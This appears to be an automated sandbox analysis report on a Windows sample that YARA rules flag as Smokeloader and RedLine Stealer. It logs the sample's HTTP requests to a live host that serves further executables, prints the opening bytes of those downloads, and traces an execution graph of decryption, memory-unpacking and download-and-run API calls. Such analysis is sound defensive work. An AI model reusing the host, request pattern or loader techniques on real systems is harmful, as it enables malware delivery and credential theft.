                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                              User-Agent: C
                                                                              Host: 185.156.73.23
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              Dec 20, 2024 16:28:14.202186108 CET203INHTTP/1.1 200 OK
                                                                              Date: Fri, 20 Dec 2024 15:28:12 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Content-Length: 1
                                                                              Keep-Alive: timeout=5, max=87
                                                                              Connection: Keep-Alive
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 30
                                                                              Data Ascii: 0
                                                                              Dec 20, 2024 16:28:17.290843964 CET394OUTGET /soft/download HTTP/1.1
                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                              User-Agent: d
                                                                              Host: 185.156.73.23
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              Dec 20, 2024 16:28:18.011960983 CET1236INHTTP/1.1 200 OK
                                                                              Date: Fri, 20 Dec 2024 15:28:17 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Content-Disposition: attachment; filename="dll";
                                                                              Content-Length: 242176
                                                                              Keep-Alive: timeout=5, max=86
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/octet-stream
                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                                              Dec 20, 2024 16:28:18.506177902 CET394OUTGET /soft/download HTTP/1.1
                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                              User-Agent: s
                                                                              Host: 185.156.73.23
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              Dec 20, 2024 16:28:19.232727051 CET1236INHTTP/1.1 200 OK
                                                                              Date: Fri, 20 Dec 2024 15:28:18 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Content-Disposition: attachment; filename="soft";
                                                                              Content-Length: 1502720
                                                                              Keep-Alive: timeout=5, max=85
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/octet-stream
                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-a


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:10:27:34
                                                                              Start date:20/12/2024
                                                                              Path:C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\dI3n4LSHB7.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'945'600 bytes
                                                                              MD5 hash:2725F2B0FFA89F08642D36CAF06C3CE4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2421354084.0000000000D79000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:10:28:23
                                                                              Start date:20/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 480
                                                                              Imagebase:0xfa0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:2.3%
                                                                                Dynamic/Decrypted Code Coverage:19.2%
                                                                                Signature Coverage:11.8%
                                                                                Total number of Nodes:1088
                                                                                Total number of Limit Nodes:22
                                                                                execution_graph 39469 10001f20 39512 10005956 GetSystemTimeAsFileTime 39469->39512 39471 10001f48 39514 100059d5 39471->39514 39473 10001f4f 39517 10001523 39473->39517 39475 10002174 39547 100010a3 39475->39547 39480 10002025 39550 10001cdd 44 API calls __EH_prolog3_GS 39480->39550 39483 1000202e 39511 10002164 39483->39511 39551 100059b4 27 API calls _unexpected 39483->39551 39485 10001bb9 15 API calls 39487 10002172 39485->39487 39486 10002040 39552 10001c33 29 API calls 39486->39552 39487->39475 39489 10002052 39553 10002493 17 API calls __InternalCxxFrameHandler 39489->39553 39491 1000205f 39554 10002230 17 API calls __InternalCxxFrameHandler 39491->39554 39493 10002079 39555 10002230 17 API calls __InternalCxxFrameHandler 39493->39555 39495 1000209f 39556 1000219f 17 API calls __InternalCxxFrameHandler 39495->39556 39497 100020a9 39557 10001bb9 39497->39557 39500 10001bb9 15 API calls 39501 100020bb 39500->39501 39502 10001bb9 15 API calls 39501->39502 39503 100020c4 39502->39503 39561 10001725 8 API calls CatchGuardHandler 39503->39561 39505 100020df 39506 10002100 CreateProcessA 39505->39506 39507 10002135 39506->39507 39508 1000213c ShellExecuteA 39506->39508 39507->39508 39509 1000215b 39507->39509 39508->39509 39510 10001bb9 15 API calls 39509->39510 39510->39511 39511->39485 39513 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39512->39513 39513->39471 39562 10006e9c GetLastError 39514->39562 39518 1000152f __EH_prolog3_GS 39517->39518 39595 1000184b 39518->39595 39520 10001593 39599 1000190a 39520->39599 39522 100015ff 39604 1000179a 39522->39604 39523 10001541 39523->39520 39529 1000179a 17 API calls 39523->39529 39525 1000160d 39609 10005939 39525->39609 39528 10001650 InternetSetOptionA InternetConnectA 39532 10001692 HttpOpenRequestA 39528->39532 39533 100016e8 InternetCloseHandle 39528->39533 39529->39520 39530 10001704 39535 10001bb9 15 API calls 39530->39535 39531 100016eb 39531->39530 39658 10001bdc 15 API calls 39531->39658 39536 100016e2 InternetCloseHandle 39532->39536 39537 100016bc 39532->39537 39533->39531 39539 1000171b 39535->39539 39536->39533 39612 100010c7 39537->39612 39659 1000e8a5 39539->39659 39542 100016d3 39626 10001175 39542->39626 39543 100016df InternetCloseHandle 39543->39536 39548 100010ad 39547->39548 39549 100010bd CoUninitialize 39548->39549 39550->39483 39551->39486 39552->39489 39553->39491 39554->39493 39555->39495 39556->39497 39558 10001bc4 39557->39558 39559 10001bcc 39557->39559 39710 10001bdc 15 API calls 39558->39710 39559->39500 39561->39505 39563 10006eb3 39562->39563 39564 10006eb9 39562->39564 39587 10007580 6 API calls _unexpected 39563->39587 39568 10006ebf SetLastError 39564->39568 39588 100075bf 6 API calls _unexpected 39564->39588 39567 10006ed7 39567->39568 39569 10006edb 39567->39569 39575 10006f53 39568->39575 39576 100059df 39568->39576 39589 10007aa7 12 API calls 2 library calls 39569->39589 39572 10006ee7 39573 10006f06 39572->39573 39574 10006eef 39572->39574 39591 100075bf 6 API calls _unexpected 39573->39591 39590 100075bf 6 API calls _unexpected 39574->39590 39594 10006928 27 API calls CallUnexpected 39575->39594 39576->39473 39580 10006f12 39582 10006f16 39580->39582 39583 10006f27 39580->39583 39592 100075bf 6 API calls _unexpected 39582->39592 39593 10006c9e EnterCriticalSection LeaveCriticalSection _unexpected 39583->39593 39586 10006efd 39586->39568 39587->39564 39588->39567 39589->39572 39590->39586 39591->39580 39592->39586 39593->39586 39596 10001868 39595->39596 39596->39596 39597 1000190a 17 API calls 39596->39597 39598 1000187c 39597->39598 39598->39523 39600 10001978 39599->39600 39603 10001920 __InternalCxxFrameHandler 39599->39603 39662 10001a59 17 API calls std::_Xinvalid_argument 39600->39662 39603->39522 39605 100017eb 39604->39605 39608 100017b3 __InternalCxxFrameHandler 39604->39608 39663 10001884 17 API calls 39605->39663 39608->39525 39664 100070ee 39609->39664 39613 100010d3 __EH_prolog3_GS 39612->39613 39614 1000184b 17 API calls 39613->39614 39615 100010e3 HttpAddRequestHeadersA 39614->39615 39690 100017f1 39615->39690 39617 10001112 HttpAddRequestHeadersA 39618 100017f1 17 API calls 39617->39618 39619 10001132 HttpAddRequestHeadersA 39618->39619 39620 100017f1 17 API calls 39619->39620 39621 10001152 HttpAddRequestHeadersA 39620->39621 39622 10001bb9 15 API calls 39621->39622 39623 1000116d 39622->39623 39624 1000e8a5 5 API calls 39623->39624 39625 10001172 HttpSendRequestA 39624->39625 39625->39542 39625->39543 39627 10001184 __EH_prolog3_GS 39626->39627 39628 100011c5 InternetSetFilePointer 39627->39628 39629 100011e3 InternetReadFile 39628->39629 39631 1000121d __InternalCxxFrameHandler 39629->39631 39630 10001260 39632 1000127d HttpQueryInfoA 39630->39632 39631->39629 39631->39630 39633 100012a6 CoCreateInstance 39632->39633 39634 1000150a 39632->39634 39633->39634 39635 100012d8 39633->39635 39636 1000e8a5 5 API calls 39634->39636 39635->39634 39638 1000184b 17 API calls 39635->39638 39637 10001520 39636->39637 39637->39543 39639 100012f7 39638->39639 39695 10001006 20 API calls 39639->39695 39641 1000130c 39642 10001bb9 15 API calls 39641->39642 39648 1000134f 39642->39648 39643 1000149d 39699 10005926 12 API calls __dosmaperr 39643->39699 39645 100014ae __InternalCxxFrameHandler 39645->39634 39646 10001427 __InternalCxxFrameHandler 39646->39643 39646->39645 39649 100014aa 39646->39649 39647 100014a2 39701 1000584c 15 API calls __strnicoll 39647->39701 39648->39645 39648->39646 39652 10001456 39648->39652 39653 10001449 39648->39653 39649->39645 39700 10005926 12 API calls __dosmaperr 39649->39700 39652->39646 39697 10005926 12 API calls __dosmaperr 39652->39697 39696 10005926 12 API calls __dosmaperr 39653->39696 39655 1000144e 39698 1000584c 15 API calls __strnicoll 39655->39698 39658->39530 39702 100026ff 39659->39702 39661 10001722 39661->39475 39661->39480 39667 10007102 39664->39667 39665 10007106 39682 10001629 InternetOpenA 39665->39682 39683 10005926 12 API calls __dosmaperr 39665->39683 39667->39665 39669 10007140 39667->39669 39667->39682 39668 10007130 39684 1000584c 15 API calls __strnicoll 39668->39684 39685 100069d1 27 API calls 2 library calls 39669->39685 39672 1000714c 39673 10007156 39672->39673 39678 1000716d 39672->39678 39686 1000a31e 15 API calls 2 library calls 39673->39686 39675 10007244 39675->39682 39689 10005926 12 API calls __dosmaperr 39675->39689 39676 100071ef 39676->39682 39687 10005926 12 API calls __dosmaperr 39676->39687 39678->39675 39678->39676 39680 10007238 39688 1000584c 15 API calls __strnicoll 39680->39688 39682->39528 39682->39531 39683->39668 39684->39682 39685->39672 39686->39682 39687->39680 39688->39682 39689->39682 39692 100017ff 39690->39692 39691 1000180d __InternalCxxFrameHandler 39691->39617 39692->39691 39694 1000188f 17 API calls __InternalCxxFrameHandler 39692->39694 39694->39691 39695->39641 39696->39655 39697->39655 39698->39646 39699->39647 39700->39647 39701->39645 39703 10002707 39702->39703 39704 10002708 IsProcessorFeaturePresent 39702->39704 39703->39661 39706 10002b1c 39704->39706 39709 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39706->39709 39708 10002bff 39708->39661 39709->39708 39710->39559 39711 4034c0 CryptAcquireContextW 39712 40360a GetLastError CryptReleaseContext 39711->39712 39713 40354e CryptCreateHash 39711->39713 39714 403754 39712->39714 39713->39712 39715 403572 39713->39715 39716 40377a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39714->39716 39718 4037a2 39714->39718 39715->39715 39735 409035 39715->39735 39760 408ec2 39716->39760 39767 40c26f 39718->39767 39720 40379e 39721 4035aa 39749 40e46b 39721->39749 39726 4035e6 CryptDeriveKey 39726->39712 39728 403625 39726->39728 39727 4035d8 GetLastError 39727->39714 39753 40e2bd 39728->39753 39730 40362b __InternalCxxFrameHandler 39731 409035 27 API calls 39730->39731 39734 40364a __InternalCxxFrameHandler 39731->39734 39732 403748 CryptDestroyKey 39732->39714 39733 4036bc CryptDecrypt 39733->39732 39733->39734 39734->39732 39734->39733 39737 408ff7 39735->39737 39736 40e2bd ___std_exception_copy 15 API calls 39736->39737 39737->39736 39738 409016 39737->39738 39740 409018 39737->39740 39774 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 39737->39774 39738->39721 39741 401600 Concurrency::cancel_current_task 39740->39741 39743 409022 39740->39743 39772 40a370 RaiseException 39741->39772 39775 40a370 RaiseException 39743->39775 39744 40161c 39773 40a131 26 API calls 2 library calls 39744->39773 39747 4097b1 39748 401643 39748->39721 39750 40e479 39749->39750 39776 40e2c8 39750->39776 39759 41249e __dosmaperr 39753->39759 39754 4124dc 39814 40c339 14 API calls __dosmaperr 39754->39814 39756 4124c7 RtlAllocateHeap 39757 4124da 39756->39757 39756->39759 39757->39730 39759->39754 39759->39756 39813 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 39759->39813 39761 408eca 39760->39761 39762 408ecb IsProcessorFeaturePresent 39760->39762 39761->39720 39764 408f12 39762->39764 39815 408ed5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39764->39815 39766 408ff5 39766->39720 39816 40c1fb 25 API calls 2 library calls 39767->39816 39769 40c27e 39817 40c28c 11 API calls __FrameHandler3::FrameUnwindToState 39769->39817 39771 40c28b 39772->39744 39773->39748 39774->39737 39775->39747 39777 40e2df 39776->39777 39778 40e2f1 39777->39778 39779 40e309 39777->39779 39787 4035bc CryptHashData 39777->39787 39803 40c339 14 API calls __dosmaperr 39778->39803 39805 40c369 37 API calls 2 library calls 39779->39805 39782 40e2f6 39804 40c25f 25 API calls __cftof 39782->39804 39783 40e314 39785 40e341 39783->39785 39786 40e322 39783->39786 39789 40e413 39785->39789 39790 40e349 39785->39790 39806 413393 19 API calls 3 library calls 39786->39806 39787->39726 39787->39727 39789->39787 39811 4132ab MultiByteToWideChar 39789->39811 39790->39787 39807 4132ab MultiByteToWideChar 39790->39807 39793 40e38b 39793->39787 39795 40e396 GetLastError 39793->39795 39794 40e43d 39794->39787 39812 40c339 14 API calls __dosmaperr 39794->39812 39796 40e3f6 39795->39796 39802 40e3a1 39795->39802 39796->39787 39810 40c339 14 API calls __dosmaperr 39796->39810 39799 40e3e0 39809 4132ab MultiByteToWideChar 39799->39809 39802->39796 39802->39799 39808 413271 37 API calls 2 library calls 39802->39808 39803->39782 39804->39787 39805->39783 39806->39787 39807->39793 39808->39802 39809->39796 39810->39787 39811->39794 39812->39787 39813->39759 39814->39757 39815->39766 39816->39769 39817->39771 39818 4020c0 39819 40213b 39818->39819 39820 4020dd 39818->39820 39822 408ec2 CatchGuardHandler 5 API calls 39819->39822 39820->39819 39821 4020e3 CreateFileA 39820->39821 39821->39819 39823 402103 WriteFile CloseHandle 39821->39823 39824 402149 39822->39824 39825 408ec2 CatchGuardHandler 5 API calls 39823->39825 39826 402135 39825->39826 39827 401880 39828 4018e9 InternetSetFilePointer InternetReadFile 39827->39828 39829 40197d __cftof 39828->39829 39830 4019a2 HttpQueryInfoA 39829->39830 39831 401d25 39830->39831 39832 4019c6 CoCreateInstance 39830->39832 39833 408ec2 CatchGuardHandler 5 API calls 39831->39833 39832->39831 39835 4019ff 39832->39835 39834 401d50 39833->39834 39835->39831 39855 402470 39835->39855 39837 401a5c MultiByteToWideChar 39838 409035 27 API calls 39837->39838 39839 401aae MultiByteToWideChar 39838->39839 39840 401b10 39839->39840 39840->39840 39870 402310 27 API calls 3 library calls 39840->39870 39842 401c00 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39844 401cf1 39842->39844 39847 409035 27 API calls 39842->39847 39843 401b2c 39843->39842 39845 401d56 39843->39845 39844->39831 39846 40c26f 25 API calls 39845->39846 39848 401d5b 39846->39848 39849 401c37 39847->39849 39849->39844 39850 401cc4 39849->39850 39851 409035 27 API calls 39849->39851 39872 4014b0 25 API calls 3 library calls 39850->39872 39852 401cb4 39851->39852 39871 4014b0 25 API calls 3 library calls 39852->39871 39858 40248e __InternalCxxFrameHandler 39855->39858 39860 4024b4 39855->39860 39856 40259e 39875 4016a0 27 API calls std::_Xinvalid_argument 39856->39875 39858->39837 39859 4025a3 39876 401600 27 API calls 2 library calls 39859->39876 39860->39856 39862 402508 39860->39862 39863 40252d 39860->39863 39862->39859 39873 401600 27 API calls 3 library calls 39862->39873 39868 402519 __InternalCxxFrameHandler 39863->39868 39874 401600 27 API calls 3 library calls 39863->39874 39864 4025a8 39867 40c26f 25 API calls 39867->39856 39868->39867 39869 402580 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39868->39869 39869->39837 39870->39843 39871->39850 39872->39844 39873->39868 39874->39868 39876->39864 39877 40e268 39880 411ac2 39877->39880 39879 40e280 39881 411af6 __dosmaperr 39880->39881 39882 411acd RtlFreeHeap 39880->39882 39881->39879 39882->39881 39883 411ae2 39882->39883 39886 40c339 14 API calls __dosmaperr 39883->39886 39885 411ae8 GetLastError 39885->39881 39886->39885 39887 4b4003c 39888 4b40049 39887->39888 39902 4b40e0f SetErrorMode SetErrorMode 39888->39902 39893 4b40265 39894 4b402ce VirtualProtect 39893->39894 39896 4b4030b 39894->39896 39895 4b40439 VirtualFree 39900 4b405f4 LoadLibraryA 39895->39900 39901 4b404be 39895->39901 39896->39895 39897 4b404e3 LoadLibraryA 39897->39901 39899 4b408c7 39900->39899 39901->39897 39901->39900 39903 4b40223 39902->39903 39904 4b40d90 39903->39904 39905 4b40dad 39904->39905 39906 4b40238 VirtualAlloc 39905->39906 39907 4b40dbb GetPEB 39905->39907 39906->39893 39907->39906 39908 d79c1e 39909 d79c2d 39908->39909 39912 d7a3be 39909->39912 39913 d7a3d9 39912->39913 39914 d7a3e2 CreateToolhelp32Snapshot 39913->39914 39915 d7a3fe Module32First 39913->39915 39914->39913 39914->39915 39916 d7a40d 39915->39916 39918 d79c36 39915->39918 39919 d7a07d 39916->39919 39920 d7a0a8 39919->39920 39921 d7a0f1 39920->39921 39922 d7a0b9 VirtualAlloc 39920->39922 39921->39921 39922->39921 39923 9aa2b0 LoadLibraryA 39924 100079ee 39925 10007a2c 39924->39925 39929 100079fc _unexpected 39924->39929 39932 10005926 12 API calls __dosmaperr 39925->39932 39927 10007a17 RtlAllocateHeap 39928 10007a2a 39927->39928 39927->39929 39929->39925 39929->39927 39931 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 39929->39931 39931->39929 39932->39928 39933 a866c7 39934 a86f53 VirtualAlloc 39933->39934 39936 a86fb3 39934->39936 39937 402c70 39938 402c94 SetLastError 39937->39938 39939 402cbc 39937->39939 40015 402920 67 API calls 39938->40015 39941 402cc6 39939->39941 39942 402d01 SetLastError 39939->39942 39952 402d29 39939->39952 40016 402920 67 API calls 39941->40016 40017 402920 67 API calls 39942->40017 39943 402ca6 39945 408ec2 CatchGuardHandler 5 API calls 39943->39945 39948 402cb8 39945->39948 39947 402d13 39951 408ec2 CatchGuardHandler 5 API calls 39947->39951 39949 402cd0 SetLastError 39950 408ec2 CatchGuardHandler 5 API calls 39949->39950 39953 402ced 39950->39953 39954 402d25 39951->39954 39952->39941 39955 402d94 GetNativeSystemInfo 39952->39955 39955->39941 39956 402dc3 VirtualAlloc 39955->39956 39957 402e03 GetProcessHeap HeapAlloc 39956->39957 39958 402ddd VirtualAlloc 39956->39958 39960 402e20 VirtualFree 39957->39960 39961 402e34 39957->39961 39958->39957 39959 402def 39958->39959 40018 402920 67 API calls 39959->40018 39960->39961 39963 402e7c SetLastError 39961->39963 39964 402e9e VirtualAlloc 39961->39964 39966 402e84 39963->39966 39972 402eb7 __InternalCxxFrameHandler __cftof 39964->39972 39965 402df9 39965->39957 40019 4033d0 16 API calls ___std_exception_destroy 39966->40019 39968 402e8b 39969 408ec2 CatchGuardHandler 5 API calls 39968->39969 39970 402e9a 39969->39970 39972->39963 39972->39966 39974 402f9c 39972->39974 39991 402bf0 VirtualAlloc 39972->39991 39973 40303c 39973->39966 39975 403165 39973->39975 40000 402950 39973->40000 39992 402a80 39974->39992 39976 402950 50 API calls 39975->39976 39977 403176 39976->39977 39977->39966 39981 40317e 39977->39981 39979 40320a 39982 408ec2 CatchGuardHandler 5 API calls 39979->39982 39980 4031ba 39983 4031f4 39980->39983 39984 4031c5 39980->39984 39981->39979 39981->39980 39986 403220 39982->39986 39985 408ec2 CatchGuardHandler 5 API calls 39983->39985 39988 408ec2 CatchGuardHandler 5 API calls 39984->39988 39987 403206 39985->39987 39989 4031f0 39988->39989 39991->39972 39993 402bdc 39992->39993 39997 402aa0 39992->39997 39993->39973 39994 402bcb SetLastError 39994->39973 39995 402bae SetLastError 39995->39973 39997->39993 39997->39994 39997->39995 39998 402b8f SetLastError 39997->39998 39998->39973 40001 402969 40000->40001 40009 4029a5 40000->40009 40003 402974 40001->40003 40004 4029be VirtualProtect 40001->40004 40002 408ec2 CatchGuardHandler 5 API calls 40005 4029ba 40002->40005 40003->40009 40020 402c10 VirtualFree 40003->40020 40006 402a02 GetLastError FormatMessageA 40004->40006 40004->40009 40005->39973 40007 402a27 40006->40007 40007->40007 40008 402a2e LocalAlloc 40007->40008 40021 4028e0 42 API calls 40008->40021 40009->40002 40011 402a51 OutputDebugStringA LocalFree LocalFree 40012 408ec2 CatchGuardHandler 5 API calls 40011->40012 40013 402a77 40012->40013 40013->39973 40015->39943 40016->39949 40017->39947 40018->39965 40019->39968 40020->40009 40021->40011 40022 9a95e8 40026 9ab90d 40022->40026 40023 9ad3da RegOpenKeyA 40024 9ad401 RegOpenKeyA 40023->40024 40023->40026 40024->40026 40025 9ad462 GetNativeSystemInfo 40025->40026 40026->40023 40026->40024 40026->40025 40027 9ad4b7 40026->40027 40028 aab310 VirtualProtect 40029 aab2f1 40028->40029 40030 40955c 40031 409568 CallCatchBlock 40030->40031 40058 4092bc 40031->40058 40033 40956f 40034 4096c2 40033->40034 40045 409599 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 40033->40045 40086 4097b2 4 API calls 2 library calls 40034->40086 40036 4096c9 40087 40f00b 40036->40087 40040 4096d7 40041 4095b8 40042 409639 40066 4098cd 40042->40066 40045->40041 40045->40042 40082 40efe5 37 API calls 4 library calls 40045->40082 40059 4092c5 40058->40059 40091 4099b3 IsProcessorFeaturePresent 40059->40091 40061 4092d1 40092 40ab6a 10 API calls 2 library calls 40061->40092 40063 4092d6 40064 4092da 40063->40064 40093 40ab89 7 API calls 2 library calls 40063->40093 40064->40033 40094 40aa10 40066->40094 40068 4098e0 GetStartupInfoW 40069 40963f 40068->40069 40070 410b89 40069->40070 40096 4167a2 40070->40096 40072 409647 40075 408020 40072->40075 40074 410b92 40074->40072 40102 416a47 37 API calls 40074->40102 40076 402470 27 API calls 40075->40076 40077 408055 40076->40077 40078 402470 27 API calls 40077->40078 40079 40807a 40078->40079 40105 4055c0 40079->40105 40082->40042 40086->40036 40837 40eea9 40087->40837 40090 40efcf 23 API calls __FrameHandler3::FrameUnwindToState 40090->40040 40091->40061 40092->40063 40093->40064 40095 40aa27 40094->40095 40095->40068 40095->40095 40097 4167ab 40096->40097 40101 4167dd 40096->40101 40103 4112ba 37 API calls 3 library calls 40097->40103 40099 4167ce 40104 4165e9 47 API calls 3 library calls 40099->40104 40101->40074 40102->40074 40103->40099 40104->40101 40524 40f20b 40105->40524 40110 402470 27 API calls 40112 40564e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40110->40112 40111 402470 27 API calls 40138 4056b9 __cftof std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40111->40138 40112->40111 40112->40138 40114 409035 27 API calls 40114->40138 40115 405a91 40530 4064d0 40115->40530 40118 405ab2 40540 4022d0 40118->40540 40121 405ac2 40544 402200 40121->40544 40125 405ad6 40126 405bab 40125->40126 40127 405ade 40125->40127 40656 406770 39 API calls 2 library calls 40126->40656 40132 405af1 40127->40132 40133 405b4e 40127->40133 40128 40c26f 25 API calls 40128->40138 40131 405bb0 40139 4022d0 27 API calls 40131->40139 40646 406550 39 API calls 2 library calls 40132->40646 40651 406660 39 API calls 2 library calls 40133->40651 40134 405a45 Sleep 40134->40138 40137 405af6 40143 4022d0 27 API calls 40137->40143 40138->40114 40138->40115 40138->40128 40138->40134 40141 402470 27 API calls 40138->40141 40146 405a6a 40138->40146 40153 405a51 40138->40153 40156 405a3b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40138->40156 40611 40f158 41 API calls 40138->40611 40612 409170 6 API calls 40138->40612 40613 409482 28 API calls 40138->40613 40614 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40138->40614 40615 408a60 40138->40615 40620 401d60 40138->40620 40142 405bc0 40139->40142 40140 405b53 40144 4022d0 27 API calls 40140->40144 40141->40138 40147 402200 25 API calls 40142->40147 40145 405b06 40143->40145 40148 405b63 40144->40148 40647 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40145->40647 40644 408440 27 API calls 40146->40644 40151 405bd4 40147->40151 40652 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40148->40652 40157 405caa 40151->40157 40158 405bdc 40151->40158 40153->40146 40636 4037d0 40153->40636 40154 405a76 40161 402200 25 API calls 40154->40161 40155 405b0f 40162 402200 25 API calls 40155->40162 40156->40134 40665 406b10 39 API calls 2 library calls 40157->40665 40657 4067f0 39 API calls 2 library calls 40158->40657 40159 405b6c 40165 402200 25 API calls 40159->40165 40166 405a7e 40161->40166 40167 405b17 40162->40167 40170 405b74 40165->40170 40172 402200 25 API calls 